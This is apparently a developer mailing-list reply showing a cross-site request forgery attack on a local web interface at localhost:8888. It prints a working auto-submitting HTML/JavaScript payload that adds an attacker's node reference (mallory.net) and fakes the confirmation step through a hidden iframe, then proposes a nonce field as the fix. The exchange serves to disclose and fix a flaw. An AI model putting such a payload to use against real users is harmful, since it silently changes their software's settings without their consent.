Matthew Toseland wrote:
> So not only can it not read a frame from a different domain, it can't
> open one in a hidden iframe and then submit it either?
The script doesn't need to submit the same confirmation returned by the
server - it can just fake it like it did with the original form.
Something like this:
...
<script type='text/javascript'>
function submitFirst() {
document.forms['form'].submit();
window.setTimeout ('submitSecond()', 2000);
}
function submitSecond() {
document.forms['confirmation'].submit();
}
</script>
</head>
<body onload='submitFirst()'>
<form name='form' action='http://localhost:8888/darknet/' method='post'
enctype='multipart/form-data' target='hidden_iframe'>
<input name='url' type='hidden' value='http://mallory.net/ref.txt' />
<input name='connect' type='hidden' value='Connect' />
</form>
<form name='confirmation' action='http://localhost:8888/confirm/'
method='post' enctype='multipart/form-data' target='hidden_iframe'>
<input name='areYouSure' type='hidden' value='Yes' />
</form>
...
As far as I can see, the only way to prevent this is to put a nonce in a
hidden field in the form. If the nonce doesn't match when the form is
submitted, ignore the request and maybe alert the user.
Cheers,
Michael
